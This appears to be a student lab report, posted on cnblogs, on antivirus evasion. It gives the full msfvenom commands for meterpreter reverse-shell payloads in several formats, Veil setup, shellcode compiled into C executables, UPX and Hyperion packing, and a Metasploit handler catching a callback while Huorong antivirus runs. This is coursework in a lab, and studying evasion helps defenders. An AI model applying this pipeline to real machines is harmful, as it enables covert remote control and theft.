首页 > 其他分享 >20222422 2024-2025-1 《网络与系统攻防技术》实验三实验报告

20222422 2024-2025-1 《网络与系统攻防技术》实验三实验报告

时间:2024-10-23 21:43:33浏览次数:1  
标签:exe 免杀 2024 2025 20222422tky 20222422 msfvenom veil 输入

一、实验内容

1、方法

  • 对后门实验中的msf编码器进行进一步的探索使用,使用msfvenom指令生成如jar之类的文件,从而尝试达到免杀的目的;
  • 通过Veil等工具对目标程序进行加壳或者其他操作来实现免杀;
  • 使用C+ShellCode编程实现免杀;

2、应用

通过组合应用各种技术尽可能地实现恶意代码免杀或者是与杀软共生(如果成功实现了免杀的,简单语言描述原理,不要截图;与杀软共生的结果验证要截图)

3、拓展

用另一电脑配合进行实测,在杀软开启的情况下,可以成功运行程序并回连成功(注明电脑的杀软名称与版本)

二、实验过程

1、免杀方法测试之msf

(1)首先通过编辑器msf生成一个正常的后门程序,利用如下指令。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.131 PORT=2422 -f exe > 20222422tky_1.exe

(2)使用msfvenom指令生成后门程序,多次编码(-i 10代表编码10次),代码如下:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.198.131 LPORT=2422 -f exe > 20222422tky_2.exe

(3)生成jar文件,代码如下:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.198.131 LPORT=2422 -f jar > 20222422tky_3.jar

(4)生成php文件,代码如下:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.198.131 LPORT=2422 x> 20222422tky_4.php

(5)生成py文件,代码如下:

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.198.131 LPORT=2422 -f py > 20222422tky_5.py

(6)登录VirusTotal网站,进行检测:
20222422tky_1:

20222422tky_2:

20222422tky_3:

20222422tky_4:

20222422tky_5:

2、免杀方法测试之Veil

(1)下载Veil,依次输入如下代码。

mkdir -p ~/.cache/wine

cd ~/.cache/wine

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

dpkg --add-architecture i386

sudo apt-get update

sudo apt-get install wine32

再依次输入:

apt-get install veil

sudo su

cd /usr/share/veil/config/

vim setup.sh

找到下图内容,按i键进入编辑模式,把下载地址换成https://gitee.com/spears/VeilDependencies.git,按ESC键,输入:wq退出;

运行veil进行安装:

发现报错,输入sudo /usr/share/veil/config/setup.sh --force --silent,继续安装

完成安装,输入veil;

(2)输入use evasion ,进入Evil—Evasion:

输入list来查看可使用的payload类型:

发现“c/meterpretermrev_tcp.py”是7号,所以输入use 7

设置反弹链接ip(Kali的ip):

set LHOST 192.168.198.131

设置端口:

set LPORT 2422

输入generate,设置生成文件名称为20222422_veil:

输入cd /var/lib/veil/output/compiled/进入文件夹,查看生成的.exe可执行文件:

将20222422_veil.exe文件传到主机中:

使用VirusTotal进行检测:

3.使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.131 LPORT=2422 -f c来生成一段shellcode

输入touch 20222422tky.c新建一个.c文件,并输入vim 20222422tky.c进行编辑,将上面的代码复制并添加如下代码:

输入:wq保存。

输入i686-w64-mingw32-g++ 20222422tky.c -o 20222422shellcode.exe编译.c文件:

将.exe文件传到主机,测试免杀效果:

4.加壳

输入upx 20222422shellcode.exe -o upx20222422.exe进行upx加壳:

验证upx20222422.exe:

先输入cd /usr/share/windows-resources/hyperion/进入到hyperion文件,将20222422_veil.exe复制于此

再输入wine hyperion.exe -v 20222422_veil.exe 20222422_veil_jiami.exe进行hyperion加壳:

将文件传到主机,测试免杀效果:

5 启动杀软,查看整体免杀效果

发现python语言编码出来得到的文件免杀效果很好

6.通过组合应用各种技术实现恶意代码免杀

通过使用技术: c + shellcode + 异或 + 压缩壳来实现

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.131 LPORT=2422 -f c生成一段shellcode

输入touch 20222422tky_2.c生成.c文件,将shellcode代码复制并添加如下代码:

输入i686-w64-mingw32-g++ 20222422tky_2.c -o 20222422shellcode_2.exe进行编译:

输入upx 20222422shellcode_2.exe -o upx20222422shellcode_2.exe进行加壳:

将文件传到主机,并使用火绒检查此.exe所在文件夹:

发现未被识别出来,实现免杀。

7. 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

电脑版本:windows11
杀毒软件:火绒

输入msfconsole进入控制台,依次输入:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.198.131

set LPORT 2422

exploit

在主机端启动upx20222422shellcode_2.exe文件:

使用火绒查杀结果如下:

三.问题与解决方案

问题一:发现文件不能直接拖动至主机,不能传输文件。下载winscp并进行相关配置,使用root账户传文件后发现没有权限。

问题一解决:配置winscp的时候使用普通用户连接后可正常传输文件。

问题二:在使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.131 PORT=2422 -f exe > 20222422tky_1.exemsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.198.131 LPORT=2422 -f exe > 20222422tky_2.exe 指令生成文件传到windows主机后发现一下就不见了。

问题二解决:关闭windows实时保护后可以正常传文件。

问题三:在安装veil的时候总是报错,无法完成安装。

问题三解决:先是发现kali虚拟机硬盘空间不足,按照csdn里的教程加了10g的内存,发现还是无法正常安装,之后使用指令sudo /usr/share/veil/config/setup.sh --force --silent后得以正常安装。

四.学习感悟、思考

在这次实验中,我首先深入学习了MSF(Metasploit Framework)编码器的使用。通过使用msfvenom指令,我成功生成了包含恶意代码的JAR文件。这一步骤让我深刻理解了编码器的核心作用:通过对payload进行多次编码,使其难以被反病毒软件识别。尝试不同的编码器和编码次数,我发现可以有效绕过一些基本的杀毒软件检测,这让我对免杀技术有了初步的认识。

接下来,我学习了Veil工具的使用,这是一个专门用于生成免杀payload的工具。通过Veil,我成功对目标程序进行了加壳处理,这不仅增加了程序的复杂度,还进一步降低了被杀毒软件检测到的风险。这个过程中,我意识到,免杀技术并非一成不变,而是需要不断尝试和调整,以应对不断更新的杀毒软件。

最后,我尝试使用C语言和ShellCode编程来实现免杀。这一过程相对复杂,但极具挑战性。通过编写C程序,并将恶意ShellCode嵌入其中,我成功生成了一个看似无害的可执行文件。这种方法的优点在于,它可以使恶意代码更加隐蔽,但同时也需要较高的编程技巧和对系统底层的深入理解。

在组合应用各种技术的过程中,我深刻体会到了免杀技术的复杂性和多变性。通过不断调整和优化,我成功实现了恶意代码的免杀,使其能够在多个杀毒软件中“隐身”。这一过程中,我意识到,免杀的关键在于不断尝试和迭代,找到最适合当前环境的免杀方案。

通过这次实验,我不仅掌握了多种免杀技术的使用方法,还深刻理解了免杀技术的核心原理和实际应用。我意识到,免杀技术并非一蹴而就,而是需要不断尝试和调整的过程。同时,我也认识到了杀毒软件在网络安全中的重要性,以及免杀技术在网络安全领域的潜在威胁。因此,我将继续深入研究和学习网络安全相关知识,为未来的学习铺出道路。

标签:exe,免杀,2024,2025,20222422tky,20222422,msfvenom,veil,输入
From: https://www.cnblogs.com/20222422tky/p/18473767

相关文章

  • 20222419 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    1.实验内容1.1实践内容(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧正确使用msf编码器,使用msfvenom生成如jar之类的其他文件veil,加壳工具使用C+shellcode编程(2)通过组合应用各种技术实现恶意代码免杀如果成功实现了免杀的,简单语言描述原......
  • 20222409 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容1.1本周学习内容后门技术:学习了后门的定义及其在网络安全中的作用。后门是一种隐秘的进入方式,允许攻击者绕过正常的认证机制,获取系统访问权限。在实验中实践了如何利用后门获取shell。netcat:可以用于创建TCP/UDP连接,实现远程shell访问和文件传输。socat:功能更强大......
  • cyi 源鲁杯2024第一轮wp
    Round1Misc[Round1]hide_pngstegsolve黑白通道(需要自己适当调整大小),然后丁真YLCTF{a27f2d1a-9176-42cf-a2b6-1c87b17b98dc}[Round1]plain_crack给了build.py和初始的build,压缩后发现两个文件一样,且加密算法为zipcrypto,考虑明文攻击APCHPR,得到秘钥就可以停了使用......
  • 2024.6.29
    2024.6.29T1题面给定一个序列\(a\),从中若干个数,第\(i\)个元素有\(p_i\)的概率被选中,每个元素是否被选中之间是相互独立的。如果\(b\)的异或和为\(s\),称它的权值为\(s^2\),求\(b\)的权值的期望。答案对\(10^9+7\)取模。题解因为是异或操作,我们可以转到二进制......
  • 20222415 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容本周学习了后门技术,包括后门的概念和实现方式,学习了后门攻击的过程和实践;并且初步学习了免杀。2.实验过程2.1使用netcat获取主机操作Shell,cron启动某项任务(1)使用netcat获取主机操作虚拟机登录root,主机在cmd窗口输入ncat.exe-l-p8888Linux虚机输入指令nc192.16......
  • 2024智能机器人与自动控制国际学术会议 (IRAC 2024) 2024 International Conference on
    @目录一、会议详情二、重要信息三、大会介绍四、出席嘉宾五、征稿主题一、会议详情二、重要信息大会官网:https://ais.cn/u/vEbMBz提交检索:EICompendex、IEEEXplore、Scopus三、大会介绍2024智能机器人与自动控制国际学术会议(IRAC2024)由华南理工大学主办,会议将于2024......
  • CSP-J 2024 游记
    CSP-J2024游记Day\(-3\)忐忑不安地期待。做了一套模拟。ProblemScoreDifficultiesA\(100\)入门B\(50\)(贪心策略错了)普及-C\(50\)(双重循环\(n<=10^5\))普及D\(20\)(dp+前缀和,我写的DFS)普及+B题交完废了,幸好后面\(2\)题还行,总分......
  • cyi 源鲁杯2024第二轮wp
    Round2Web[Round2]Cmnts查看源码,base64解码得到路径get_th1s_f1ag.phpparse_str($_SERVER['QUERY_STRING']);#将url?后面的字段截取,并分别设置成变量(变量覆盖)主要逻辑在这块(感觉应该是想考变量覆盖的,但是好像代码写错了?)if(isset($key)&&$key==='a7a795a8efb7......
  • 2024秋软工实践《先天软工圣体队》团队展示与《卷卷福》选题报告
    一、开头表格软件工程课程班级链接作业要求第一次团队作业作业目标开发一个基于LLM大模型接口的软件,为传统的软件赋予全新的体验和功能。团队名称先天软工圣体队团队成员学号-名字102201312-陈言泷052206123-柯鸿毅102201531-周炳辉102201313-陈尚冰10......
  • 2024.10.23训练记录
    上午NOIP模拟A简单题。类比树状数组,反向做二维前缀和。在数组中对于左上角为{x_1,y_1},右下角为{x_2,y_2}的矩阵实现+k操作。只需要在{x_1,y_1},{x_2+1,y_2+1}位置+k,{x_2+1,y_1},{x_1,y_2+1}位置-k。最后再做一遍二维前缀和。很好想到的。想到是应该的。考试......